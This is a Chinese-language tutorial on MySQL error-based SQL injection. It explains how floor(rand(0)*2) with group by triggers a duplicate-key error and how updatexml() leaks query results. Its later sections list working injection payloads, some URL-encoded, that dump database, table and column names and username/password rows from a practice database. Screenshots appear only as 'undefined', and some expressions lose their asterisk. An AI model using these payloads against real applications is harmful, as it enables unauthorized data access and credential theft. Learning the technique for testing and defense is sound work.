1. mysql的floor()报错注入方法详细分析

遇见了 select count() from table group by floor(rand(0)2); 这么条语句。学习一定要弄明白的态度，在此做个总结。

首先，只要该语句明白了，那么类似select count(*),(floor(rand(0)*2))x from table group by x;这样的变形语句基本上都可以变通（这里只是起了个别名）。

基本的查询 select 不必多说，剩下的几个关键字有 count 、group by 、floor、rand。

rand(0)*2

rand() 可以产生一个在0和1之间的随机数。

undefined

可见，每次产生的都不一样。当我们提供一个种子参数 0 后，再次查看：

undefined

可以发现，每次产生的值都是一样的。也可以称之为伪随机（产生的数据都是可预知的）。
查看多个数据看一下。（ test 是我之前创建的一个拥有9条数据的表）

undefined

发现第一条数据与刚才查看的单个数据相符合，其它的数据也完全一样。
为什么要乘以 2 呢？这就要配合 floor 函数来说了。

floor(rand(0)*2)

floor() 返回小于等于该值的最大整数。
之前我们了解到，rand() 是返回 0 到 1 之间的随机数，那么乘 2 后自然是返回 0 到 2 之间的随机数，再配合 floor() 就可以产生确定的两个数了。也就是 0 和 1。

undefined

为什么需要这两个数呢？

group by 与 count(*)

group by 主要用来对数据进行分组（相同的分为一组），这里与count() 结合使用。举个例子就一目了然了。

undefined

可以观察到，这里对重复性数据进行了整合，然后计数。

重点来了，也就是在这个整合然后计数的过程中，中间发生了什么我们是必须要明白的。
经过网上查询，发现mysql遇到该语句时会建立一个虚拟表。该虚拟表有两个字段，一个是分组的 key ，一个是计数值 count(*)。也就对应于上个截图中的 prod_price 和 count()。
然后在查询数据的时候，首先查看该虚拟表中是否存在该分组，如果存在那么计数值加1，不存在则新建该分组。*

先来解释一下count(*)与group by是如何共同工作的。首先，系统会建立一个虚拟表：

undefined

假设有表：

undefined

执行count(*) from ... group by age的过程中，会形成这样的虚拟表:

undefined

它是如何一步步形成这张表的呢？看上上图。由于group by的是age，第一次读取的就是18，在虚拟表中寻找是否已经存在18，由于表是空的，直接插入一条新数据，这时虚拟表变成这样：

undefined

继续。下一个是19，由于虚拟表中依旧没有key为19的字段，故插入。再下一个是20，继续插入。再下一个又是20。由于已经有了20，故将key为20的字段的count(*)的值加1，变为了2。剩下的以此类推，最后形成了这个虚拟表：

undefined

好了，现在group by原理讲完了。那究竟是如何将其与floor联合起来，进行floor报错呢？
先来回顾一下

payload:

select count(*), floor(rand(0)*2) as a from information_schema.tables group by a;

总体是一个group by语句，只不过这里group by的是floor(rand(0)2)。这是一个表达式，每次运算的值都是随机的。还记得我刚刚说的floor(rand(0)2)的值序列开头是011011...吧？ok，下面开始运算。
首先，建立一张虚拟表：

undefined

接着，进行group by floor(rand(0)2)。floor表达式第一次运算的值为0，在表中没有找到key为0的数据，故插入，在插入的过程中需要再取一次group by后面的值（即再进行一次floor运算，结果为1），取到了1，将之插入，并将count()置1。

undefined

继续，再进行group by floor(rand(0)2)。进行floor表达式运算，由于这是第三次运算了，故值为1。刚好表中有了key为1的数据，故直接将其对应的count()加1即可。

undefined

继续进行group by。这是第四次floor运算了，根据刚刚那个011011序列，这次的值为0，在表中找是否有key为0的数据。当然没有，故应当插入一条新记录。在插入时进行floor运算(就像第一次group by那样)，这时的值为1，并将count(*)置1。可是你会说，虚拟表中已经有了key为1的数据了啊。对，这就是问题所在了。此时就会抛出主键冗余的异常，也就是所谓的floor报错。

利用：

select count(*), concat((select database()), '-', floor(rand(0)*2)) as a from information_schema.tables group by a; #将select database()换成你想要的东西！~

报错分析

rand()的特殊性

select count(*) from test group by floor(rand(0)*2);

而又因为 rand 函数的特殊性（如果使用rand()的话，该值会被计算多次）。
在这里的意思就是，group by 进行分组时，floor(rand(0)*2)执行一次（查看分组是否存在），如果虚拟表中不存在该分组，那么在插入新分组的时候 floor(rand(0)*2) 就又计算了一次。（其实在上述 rand(0) 产生多个数据的时候，也能观察出来。只要 rand(0) 被调用，一定会产生新值）。

这样，所有的理论细节就全部明朗了。

报错

还记得我们之前产生的疑问，为什么要用 floor(rand(0)*2 产生 0 和 1 这两个数吗？

undefined

当 group by 对其进行分组的时候，首先遇到第一个值 0 ，发现 0 不存在，于是需要插入分组，就在这时，floor(rand(0)\*2)再次被触发，生成第二个值 1 ，因此最终插入虚拟表的也就是第二个值 1 ；然后遇到第三个值 1 ，因为已经存在分组 1 了，就直接计数加1（这时1的计数变为2）;遇到第四个值 0 的时候，发现 0 不存在，于是又需要插入新分组，然后floor(rand(0)*2)又被触发，生成第五个值 1 ，因此这时还是往虚拟表里插入分组 1 ，但是，分组 1 已经存在了！所以报错！

undefined

floor(rand(0)*2的作用就是产生预知的数字序列01101，然后再利用 rand() 的特殊性和group by的虚拟表，最终引起了报错。

利用floor()报错:

注入公式（Payload为自己想获取内容的脚本）：
and(select 1 from (select count(*),concat(concat(payload),floor(rand(0)*2))x from information_schema.tables group by x)y)

and(select 1 from (select count(*),concat(concat(database(),0x7e),floor(rand(0)*2))x from information_schema.tables group by x)y)
//暴库

and(select 1 from (select count(*),concat(concat((select concat(table_name) from information_schema.tables where table_schema="security" limit 3,1),0x7e),floor(rand(0)*2))x from information_schema.tables group by x)y)
//查询表

and(select 1 from (select count(*),concat(concat((select concat(column_name) from information_schema.columns where table_schema="security" and table_name="users" limit 1,1),0x7e),floor(rand(0)*2))x from information_schema.tables group by x)y)
//查询字段

and(select 1 from (select count(*),concat(concat((select concat(username,0x7e,password,0x7e) from security.users limit 1,1),0x7e),floor(rand(0)*2))x from information_schema.tables group by x)y)
//查询字段内容

2.xpath函数：

主要的两个函数：

Mysql5.1.5

1. updatexml():对xml进行查询和修改

2. extractvalue():对xml进行查询和修改

都是最大爆32位。
提示输出信息超过一行，说明这里数据库名组成的字符串长度超过了64位(group_concat()函数最大长度为64位)，所以需要放弃group_concat()函数，而使用limit 0,1来一个个输出。
limit 0,1 表示输出第一个数据。 0表示输出的起始位置，1表示跨度为1（即输出几个数据，1表示输出一个，2就表示输出两个）

and updatexml(1,concat(0x7e,(payload),0x7e))

and updatexml(1,concat(0x7e,(select user()),0x7e),1)--+
//查询当前用户名
and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+
//查询当前数据库名
 and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1),0x7e),1)--+
//查询所有的数据库名称
 id=1%27%20and%20updatexml(1,concat(0x7e,(select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),0x7e),1)%23
//查询表名
 id=1%27%20and%20updatexml(1,concat(0x7e,(select%20column_name%20from%20information_schema.columns%20where%20table_name=%27users%27%20limit%200,1),0x7e),1)%23
 //查询表下的字段
and updatexml(1,concat(0x7e,(select concat(username,0x7e,password) from security.users limit 0,1),0x7e),1)
//爆出具体的字段内容。

参考：http://www.hellomao.top/2019/08/16/web_mysql_floor/#%E6%8A%A5%E9%94%99%E5%88%86%E6%9E%90